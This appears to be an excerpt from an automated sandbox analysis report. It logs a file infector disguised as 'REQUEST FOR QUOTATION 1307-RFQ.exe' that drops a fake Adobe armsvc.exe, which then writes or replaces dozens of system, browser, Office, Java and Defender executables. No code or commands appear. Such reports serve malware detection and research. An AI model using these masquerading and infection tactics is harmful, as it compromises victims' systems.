Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
